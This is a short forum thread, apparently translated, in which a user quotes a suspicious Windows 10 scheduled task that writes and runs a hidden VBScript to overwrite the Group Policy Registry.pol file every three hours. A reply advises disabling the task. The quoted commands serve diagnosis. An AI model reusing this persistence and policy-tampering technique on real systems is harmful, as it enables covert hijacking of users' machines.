Windows 10 Scheduler has a weird "RestoreSearch" task that does something with security policy files. What exactly is going on here?

D

Dmitry Stratsevsky2016-01-06 22:08:16

Windows

Dmitry Stratsevsky, 2016-01-06 22:08:16

Windows 10 Home Edition. For some time now, I began to notice some strange blinking of the window every few hours, as if the window opened and immediately closed. I began to dig, the search led me to the Task Sheduler, where I found this suspicious task:
Name: RestoreSearch
Description: Browser search setting
Actions:

cmd.exe /c @echo Set objShell = WScript.CreateObject("WScript.Shell") > %TEMP%\R.vbs
cmd.exe /c @echo objShell.Run "cmd.exe /c (attrib -H -R -S %WinDir%\system32\GroupPolicy\Machine\Registry.pol)&(copy/b/y %WinDir%\system32\GroupPolicy\Machine\R %WinDir%\system32\GroupPolicy\Machine\Registry.pol > nul)&(gpupdate/force)&(attrib +R %WinDir%\system32\GroupPolicy\Machine\Registry.pol)", 0, True >> %TEMP%\R.vbs
wscript.exe %TEMP%\R.vbs
cmd.exe /c del/Q %TEMP%\R.vbs

It runs every 3 hours.
There is nothing in %WinDir%\system32\GroupPolicy\, so probably nothing is being copied anywhere.
Just in case, I turned it off, but I would like to understand in more detail what it is?

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

V

Vasily, 2016-01-07
@Foolleren

>>>>> %TEMP%\R.vbs
decent vbs programs do not keep scripts in temporary files, disable the task and clean the %TEMP% folder